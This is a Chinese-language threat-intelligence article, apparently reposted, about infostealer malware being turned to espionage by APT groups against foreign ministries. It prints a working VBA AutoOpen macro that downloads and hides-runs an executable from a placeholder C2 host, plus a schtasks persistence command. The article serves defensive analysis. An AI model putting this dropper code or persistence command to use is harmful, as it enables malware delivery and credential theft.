信息窃取恶意软件(Infostealer Malware)最初设计用途是从受感染主机中无差别窃取凭证,如今已演变为受国家支持的高级持续性威胁(APT)组织的有力攻击武器。
2023 年初,RedLine、Lumma、StealC 等信息窃取恶意软件家族开始出现,并迅速通过钓鱼攻击活动和恶意下载渠道扩散。
这类信息窃取恶意软件的攻击范围广泛,会窃取浏览器数据、Cookie 和系统信息。但最新情报显示,一种令人担忧的趋势已出现:被盗取的凭证正被用于实施高度定向的间谍活动。
信息窃取恶意软件的主要攻击途径
信息窃取恶意软件的主要攻击途径仍是 “含宏的钓鱼邮件”—— 邮件中附带启用宏的文档或伪造的软件安装程序。 受害者收到带有 VBA 宏的 Word 附件后,若启用宏,附件会从命令与控制(C2)服务器下载信息窃取恶意软件载荷。 该恶意软件执行后,会定位并窃取存储的凭证,涵盖电子邮件、虚拟专用网络(VPN)以及企业单点登录(SSO)门户的登录信息。攻击影响与典型案例
安全分析师指出,多个国家外交部的受损外交凭证已出现在暗网数据 dump 中,这些凭证为攻击者提供了访问高价值目标的认证权限。 影响评估显示,一旦 APT 组织通过信息窃取恶意软件获取有效的外交邮箱凭证,就能策划出几乎难以分辨的鱼叉式钓鱼攻击活动。 这类攻击活动借助 “可信发件人声誉” 和 “有效的 TLS 证书”,可绕过传统检测机制。 截至 2025 年年中,哈德逊・洛克(Hudson Rock)威胁情报平台检测到,卡塔尔外交部有超 1400 名用户的凭证受损,沙特阿拉伯、韩国、阿联酋等国也各有数百名用户受影响 —— 这一数据凸显了该威胁的全球规模。 在一起备受关注的案例中,巴黎阿曼大使馆的一个受损账户被用于向联合国官员发送恶意邀请。邮件中包含一个带有 “sysProcUpdate” 宏的 Word 文档,该宏会执行以下 VBA 代码片段: vbSub AutoOpen()
Dim objXML As Object
Set objXML = CreateObject("MSXML2.XMLHTTP")
objXML.Open "GET", "https://malicious.c2.server/payload.exe", False
objXML.Send
If objXML.Status = 200 Then
With CreateObject("ADODB.Stream")
.Type = 1
.Open
.Write objXML.responseBody
.SaveToFile Environ("TEMP") & "\update.exe", 2
End With
Shell Environ("TEMP") & "\update.exe", vbHide
End If
End Sub
(信息窃取恶意软件感染流程图(来源:信息窃取恶意软件研究团队)
载荷投递完成后,“update.exe” 会通过创建 Windows 计划任务实现持久化:
cmd
schtasks /Create /SC MINUTE /MO 15 /TN "SysProcUpdate" /TR "%TEMP%\update.exe"
研究人员发现,这种持久化机制能确保即使系统重启,恶意软件仍会重复执行,从而为攻击者提供长期访问权限。
感染机制解析
深入分析感染机制可见,信息窃取恶意软件主要利用用户信任和终端防护措施不足的漏洞发起攻击。 通过钓鱼攻击完成初步入侵后,恶意软件载荷会调用CryptUnprotectData等常见 Windows API,从浏览器和 Windows 凭据管理器中解密存储的凭证。
随后,数据窃取模块会将收集到的数据打包成加密数据包,通过 HTTPS 协议传输 —— 这种方式可规避入侵检测系统(IDS)的监测。
一旦凭证到达攻击者的基础设施,APT 组织会将其作为合法登录凭据使用;若目标系统仅要求 “用户名 – 密码” 形式的认证(未启用更严格的多因素认证),攻击者甚至能直接绕过身份验证。
通过将恶意软件嵌入看似常规的文档中,并模仿合法的系统维护任务,信息窃取恶意软件能保持 “低活跃度、慢渗透” 的隐蔽状态,使得检测工作极具挑战性。
这种将 “凭证窃取” 无缝用于定向攻击活动的模式,标志着网络间谍战术已出现令人担忧的新演变。
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。


评论